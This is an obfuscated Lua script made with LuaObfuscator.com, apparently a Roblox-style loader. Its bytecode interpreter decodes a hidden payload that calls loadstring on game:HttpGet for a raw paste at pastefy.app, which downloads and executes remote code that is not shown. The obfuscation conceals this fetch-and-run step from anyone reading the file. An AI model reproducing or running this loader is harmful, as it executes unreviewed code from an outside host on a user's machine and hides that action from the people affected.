--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v111=0;local v112;while true do if (v111==1) then return v112;end if (v111==0) then v112=v5(v86,v19);v19=nil;v111=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v31/(((3 -0) -1)^(v32-(2 -1))))%((621 -((1620 -(68 + 997)) + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + 1)) ;return v88-(v88%(928 -(214 + 713))) ;end end else local v89=0 + (1270 -(226 + 1044)) ;local v90;while true do if (v89==(0 + 0)) then v90=(879 -((1227 -945) + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v90 + v90))>=v90) and ((118 -(32 + 85)) + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + (180 -(67 + 113)) ;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v35=351 -(64 + 23 + 263) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v41 * ((33220331 -20881491) + 4438376)) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 + 0 ,(1799 -782) -(915 + 82) ) * ((5 -3)^32)) + v42 ;local v46=v20(v43,13 + 8 ,40 -9 );local v47=((v20(v43,(1657 -(145 + 293)) -(1069 + 118) )==(2 -1)) and  -(1 -0)) or ((431 -(44 + 386)) + 0) ;if (v46==(0 -0)) then if (v45==0) then return v47 * (0 + 0) ;else v46=792 -(368 + 423) ;v44=0 -0 ;end elseif (v46==2047) then return ((v45==(18 -(10 + (1494 -(998 + 488))))) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 22 + 4)) ) * (v44 + (v45/(((778 -(201 + 571)) -4)^(23 + 29)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91== #"\\") then if (v92== #",") then v93=(function() return v94()~=(836 -(660 + 176)) ;end)();elseif (v92==(1049 -(67 + 980))) then v93=(function() return v95();end)();elseif (v92~= #"91(") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if ((0 + 0)~=v91) then else local v118=(function() return 1474 -(1329 + 145) ;end)();local v119=(function() return;end)();while true do if ((971 -(140 + 831))==v118) then v119=(function() return 0;end)();while true do if (v119~=(1850 -(1409 + 441))) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v119=(function() return 1;end)();end if (v119~=1) then else v91=(function() return  #"<";end)();break;end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if (v102~=(0 + 0)) then else v103=(function() return 718 -(15 + 703) ;end)();while true do if (v103==0) then local v122=(function() return 0;end)();while true do if (v122~=0) then else local v151=(function() return 0 + 0 ;end)();while true do if (v151==(0 -0)) then v99[v100-#"~" ]=(function() return v101();end)();return v99,v100,v101;end end end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"~",v57 do FlatIdent_7366E,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_7366E,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"19("]=(function() return v21();end)();for v69= #"~",v23() do local v70=(function() return v21();end)();if (v20(v70, #",", #"|")~=0) then else local v107=(function() return 0;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107~=(441 -(262 + 176))) then else if (v20(v109, #"91(", #"xxx")== #"[") then v110[ #"0836"]=(function() return v58[v110[ #"?id="]];end)();end v53[v69]=(function() return v110;end)();break;end if (v107==(1722 -(345 + 1376))) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(688 -(198 + 490))) then local v124=(function() return 0;end)();while true do if (v124==0) then v110[ #"-19"]=(function() return v22();end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end elseif (v108== #"\\") then v110[ #"asd"]=(function() return v23();end)();elseif (v108==(8 -6)) then v110[ #"xxx"]=(function() return v23() -((2 + 0)^16) ;end)();elseif (v108== #"asd") then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if (v191==(1206 -(696 + 510))) then v192=(function() return 0 -0 ;end)();while true do if (v192==(1262 -(1091 + 171))) then v110[ #"-19"]=(function() return v23() -((2 + 0)^(3 + 13)) ;end)();v110[ #".dev"]=(function() return v22();end)();break;end end break;end end end v107=(function() return 6 -4 ;end)();end if (v107~=(7 -5)) then else if (v20(v109, #".", #"~")~= #"!") then else v110[6 -4 ]=(function() return v58[v110[869 -(550 + 317) ]];end)();end if (v20(v109,2 -0 ,2)== #">") then v110[ #"-19"]=(function() return v58[v110[ #"asd"]];end)();end v107=(function() return 377 -(123 + 251) ;end)();end if (v107~=0) then else local v121=(function() return 0 -0 ;end)();while true do if (v121~=(2 -1)) then else v107=(function() return 286 -(134 + 151) ;end)();break;end if (0==v121) then v108=(function() return v20(v70,700 -(208 + 490) , #"91(");end)();v109=(function() return v20(v70, #".com",6);end)();v121=(function() return 1 + 0 ;end)();end end end end end end for v71= #">",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[1992 -(582 + 1408) ];local v65=v60[10 -7 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1 -0 ;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -(1825 -(1195 + 629)) ;local v81={};local v82={};for v104=0 -0 ,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + 1 ];else v82[v104]=v79[v104 + (242 -(187 + 54)) ];end end local v83=(v80-v74) + (781 -(162 + 618)) ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if ((1830<3669) and (v85<=4)) then if (v85<=(1 + 0)) then if (v85>(0 -0)) then v82[v84[2 -0 ]]();else local v127=(0 -0) + 0 ;local v128;local v129;local v130;local v131;local v132;while true do if (((1636 -(1373 + 263))==v127) or (1430>=3612)) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v127=1001 -(451 + 549) ;end if (v127==2) then v76=v76 + 1 + 0 + 0 ;v84=v72[v76];v82[v84[2 -0 ]]=v62[v84[4 -(1 + 0) ]];v76=v76 + (1385 -((1510 -764) + 638)) ;v127=2 + (66 -(30 + 35)) ;end if (v127==((9 + 4) -4)) then v82[v84[343 -(218 + 123) ]]();v76=v76 + (1582 -(1535 + 46)) ;v84=v72[v76];do return;end break;end if (v127==3) then v84=v72[v76];v132=v84[2 + 0 ];v131=v82[v84[1 + 2 ]];v82[v132 + (561 -(306 + 254)) ]=v131;v127=1 + 3 ;end if (v127==(1 -0)) then v82[v84[1469 -(899 + (1825 -(1043 + 214))) ]]={};v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[2]]=v62[v84[7 -4 ]];v127=605 -(268 + 335) ;end if ((296 -((226 -166) + 230))==v127) then v84=v72[v76];v132=v84[2];v129,v130=v75(v82[v132](v13(v82,v132 + (573 -((1638 -(323 + 889)) + 146)) ,v84[1 + 2 ])));v77=(v130 + v132) -1 ;v127=1463 -(282 + 1174) ;end if ((2683>=2460) and (v127==(818 -((1531 -962) + 242)))) then v128=0 -0 ;for v180=v132,v77 do v128=v128 + 1 + 0 ;v82[v180]=v129[v128];end v76=v76 + ((1605 -(361 + 219)) -(706 + 318)) ;v84=v72[v76];v127=(1579 -(53 + 267)) -(721 + 530) ;end if (v127==(1276 -(945 + 326))) then v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[2]]=v84[3 + 0 ]~=(700 -(271 + 429)) ;v76=v76 + 1 + 0 ;v127=(341 + 1165) -(1408 + 92) ;end if ((v127==(1094 -(461 + 625))) or (1804>=3275)) then v132=v84[1290 -(993 + 295) ];v82[v132]=v82[v132](v13(v82,v132 + 1 + 0 ,v77));v76=v76 + (1172 -(418 + 753)) ;v84=v72[v76];v127=(417 -(15 + 398)) + 5 ;end if ((v127==(1 + 3)) or (1417>3629)) then v82[v132]=v131[v84[2 + 2 ]];v76=v76 + 1 ;v84=v72[v76];v82[v84[1 + 1 ]]=v84[(1514 -(18 + 964)) -(406 + 123) ];v127=1774 -(1749 + 20) ;end end end elseif (v85<=2) then v82[v84[1 + 1 ]]={};elseif (v85==3) then local v144=v84[1324 -((4701 -3452) + 73) ];v82[v144]=v82[v144](v13(v82,v144 + 1 + 0 ,v77));else local v146=0 + 0 ;local v147;local v148;while true do if (v146==1) then v82[v147 + 1 ]=v148;v82[v147]=v148[v84[1149 -(466 + 679) ]];break;end if ((4795>402) and (v146==0)) then v147=v84[4 -2 ];v148=v82[v84[3]];v146=2 -(1 + 0) ;end end end elseif ((4813>3565) and (v85<=6)) then if ((3912==3912) and (v85>(1905 -(106 + 1794)))) then v82[v84[1 + 1 ]]=v62[v84[853 -(20 + 830) ]];else local v136=v84[1 + 1 ];local v137,v138=v75(v82[v136](v13(v82,v136 + (2 -1) ,v84[7 -4 ])));v77=(v138 + v136) -(115 -(4 + 110)) ;local v139=584 -(57 + 527) ;for v141=v136,v77 do local v142=0;while true do if (v142==((1114 + 313) -(41 + 1386))) then v139=v139 + 1 ;v82[v141]=v137[v139];break;end end end end elseif (v85<=(110 -(17 + 86))) then v82[v84[2 + 0 ]]=v84[3]~=(0 -0) ;elseif (v85>(23 -15)) then v82[v84[2]]=v84[169 -(122 + 44) ];else do return;end end v76=v76 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F5869363752664C6A2F726177000A9Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
